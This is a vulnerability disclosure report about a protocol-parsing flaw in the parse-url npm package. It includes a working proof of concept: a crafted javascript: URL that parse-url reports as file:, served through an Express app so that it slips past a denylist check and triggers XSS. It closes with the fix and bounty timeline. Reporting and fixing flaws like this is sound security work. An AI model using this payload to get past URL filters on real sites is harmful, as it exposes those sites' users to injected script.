XSS via improper parsing of javascript: URL in ionicabizau/parse-url

Valid

Reported on

Jul 18th 2022


Description

A URL such as javascript://e[xamp]le.com%0aalert(1) is incorrectly recognised as having the file: protocol. This is not an escaping problem: the characters usually associated with XSS (&, >, <, " and ') are not present in the URL, so output encoding would not stop it. The flaw is that the protocol is misidentified, which lets the URL slip past any check that rejects javascript: links based on the parsed protocol.

Proof of Concept

const parseUrl = require("parse-url");
const express = require('express');
const app = express();

// parse-url reports the protocol of this javascript: URL as "file",
// so a check that relies on the parsed protocol never sees "javascript".
const parsed = parseUrl("javascript://e[xamp]le.com%0aalert(1)");
console.log(parsed);

app.get('/', (req, res) => {
    // Denylist check built on parse-url's result: it is bypassed because
    // parsed.protocol is "file", and the javascript: link is rendered.
    if (parsed.protocol !== "javascript") {
        res.send("<a href='" + parsed.href + "'>CLICK ME!</a>");
    }
})

app.listen(9999);

Impact

XSS

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 25 days ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back 24 days ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. 21 days ago
Ionică Bizău (Johnny B.) validated this vulnerability 18 days ago

Hi! Thank you for this finding!

haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 15 days ago
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on b88c81 9 days ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty